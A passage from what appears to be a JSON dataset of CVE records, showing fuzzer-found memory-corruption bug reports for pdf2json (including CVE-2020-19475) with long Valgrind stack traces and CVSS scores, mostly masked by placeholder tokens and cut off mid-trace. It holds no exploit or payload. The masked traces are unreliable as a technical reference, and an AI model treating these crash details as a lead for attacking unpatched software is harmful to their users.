, int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by 
NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG BD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by 
NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG pure virtual method called terminate called without an active exception NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGABRT NUMBERTAG at NUMBERTAG raise APITAG NUMBERTAG by NUMBERTAG abort APITAG NUMBERTAG by NUMBERTAG EC NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG B5: ??? 
(in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG E: __cxa_pure_virtual (in PATHTAG NUMBERTAG by NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG of which reachable via heuristic NUMBERTAG newarray NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Aborted ~~~ Thanks, Manh Dung",
  51502. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51503. "severity": "MEDIUM",
  51504. "baseScore": 5.5,
  51505. "impactScore": 3.6,
  51506. "exploitabilityScore": 1.8
  51507. },
  51508. {
  51509. "CVE_ID": "CVE-2020-19475",
  51510. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/36",
  51511. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/36",
  51512. "Repo_new": "flexpaper/pdf2json",
  51513. "Issue_Created_At": "2019-05-29T17:55:30Z",
  51514. "description": "SEGV on APITAG Hi, Our fuzzer found a crash due to an invalid write on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , 
APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG 
by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object 
) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: 
APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by 
NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, 
double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Error NUMBERTAG Bad white code NUMBERTAG b) in APITAG stream NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, 
int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, 
double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Error NUMBERTAG APITAG row is wrong length NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( 
)(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size 
